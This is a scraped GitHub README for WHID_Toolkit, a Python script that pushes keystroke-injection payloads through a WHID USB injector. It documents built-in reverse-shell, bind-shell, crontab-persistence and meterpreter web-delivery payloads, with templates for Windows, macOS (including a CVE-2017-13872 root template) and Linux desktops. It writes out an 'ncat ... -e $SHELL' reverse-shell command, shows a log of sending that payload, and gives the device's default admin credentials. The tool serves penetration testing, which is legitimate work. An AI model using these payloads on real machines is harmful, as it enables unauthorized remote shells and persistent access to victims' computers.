- Notifications
You must be signed in to change notification settings - Fork47
swisskyrepo/WHID_Toolkit
Folders and files
| Name | Name | Last commit message | Last commit date | |
|---|---|---|---|---|
Repository files navigation
What is it ? It's a simple script to send commands (french keyboard) from your terminal to the WHID Injector. It will automatically convert the "azerty" to "qwerty" format if you're lazy. Furthermore it has builtins payload such as reverse-shell and bind-shell.
Warning : Newest version of WHID Toolkit expect the WHID to have a firmware in the prefered language, alternatively you can force the french keyboard with the english firmware using the--force arguments. For more customization informations go to swisskyrepo.github.io .
Where to buy a WHID Injector ? I got mine fromAliexpress
Connect to the Access Point with the SSID "Exploit" with a password of "DotAgency".
Open a web browser pointed to "http://192.168.1.1"
The default administration username is "admin" and password "hacktheplanet".
Remember to upgrade the firmware you will find the latest version in this repository
More info on the official Github :https://github.com/whid-injector/WHID
python3WHIDInjector.py-v--host127.0.0.1--port4242--payloadpayloads/windows.txt-husage:WHIDInjector.py [-h] [-v] [--host [HOST]] [--port [PORT]] [--user [USER]] [--pass [PASS]] [--panel [PANEL]] [--payload [PAYLOAD]]optionalarguments:-h,--helpshowthishelpmessageandexit-vVerbosityoftheoutput--host [HOST]Hostreverse-shell--port [PORT]Portreverse-shell--user [USER]WifiPanelusername--pass [PASS]WifiPanelpassword--panel [PANEL]WifiPanelpassword--payload [PAYLOAD]Payloadtemplate
Targeting a Windows OS
python3WHIDInjector.py-v--host127.0.0.1--port4242--payloadpayloads/windows.txt
Send a simple reverse-shell payload
$ python3 WHIDInjector.py -v --host 127.0.0.1 --port 4444 ------------------------------------------------------------- WHID injector - You need to be connected to the Exploit AP ------------------------------------------------------------- __ ° <(o )___ ( ._> / `---' @pentest_swisskyEnter a payload, eg: bash -c 'nohup ncat 127.0.0.1 4242 -e $SHELL &'------------------------------------------------------------------->>> reversePayload:Rem:Default PayloadPress:130+195CustomDelay:1000Print:bqsh 6c 4nohup ncqt !@&<)<)<! $$$$ 6e ]SHELL 14CustomDelay:1000Press:176Sending payload to http://192.168.1.1/runlivepayload| Commands | Description |
|---|---|
| bind | initiate a bind shell on results.port |
| reverse | initiate a reverse shell on results.host and results.port |
| crontab | set up a crontab reverse shell on results.host and results.port |
| meterpreter [https://YOUR_SERVER_IP:4646/posh-payload] | use exploit/multi/script/web_delivery with a posh-payload |
| send some text | send the specified text |
| h | help |
| q | quit |
You can change the options withSET option_name option_value
>>>sethost192.168.1.12>>>setport4444
At the moment the following templates are available, feel free to add more:
| Template | Description |
|---|---|
| payloads/osx_high_sierra_root.txt | CVE-2017-13872 |
| payloads/osx.txt | execute a command with [Cmd]+[Space] |
| payloads/windows.txt | execute a command with [Windows]+[R] |
| payloads/i3.txt | execute a command with [Windows]+[Enter] |
| payloads/gnome.txt | execute a command with [Alt]+[F2] |
| payloads/default.txt | default behavior is the gnome command |
NOTE: The i3 payload uses the [Windows] key as the default modifier, some people prefer to use [CTRL]